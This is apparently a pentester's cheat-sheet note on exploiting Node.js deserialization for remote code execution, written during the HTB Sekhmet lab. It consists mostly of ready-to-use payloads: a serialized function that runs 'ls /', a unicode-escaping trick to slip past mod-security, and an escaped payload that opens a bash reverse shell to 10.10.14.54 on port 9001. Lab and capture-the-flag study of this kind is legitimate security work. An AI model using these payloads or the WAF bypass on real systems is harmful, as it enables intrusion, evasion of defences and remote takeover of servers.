Node.js Deserialization

Exploiting Node.js deserialization bug for Remote Code ExecutionOpSecX

Details explaination

DeserializationHackTricks

{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}

Mod-security bypass

In HTB sekhmet lab i blocked by mod-security.

how to bypass : [change the payload to hexadecimal]

{"rce":"_$$ND_FUNC$$                //this func triggers the WAF

{"rce":"_$$\u004e\u0044_FUNC$$_\u0066unction(){ require('child_process').exec(\"bash -c 'bash -i >& /dev/tcp/10.10.14.54/9001 0>&1'\", function(error, stdout, stderr) { console.log(stdout) })}()"}

Basic explaination

Serialization and deserialization in Node.jsHoneybadger

Insecure DeserializationMedium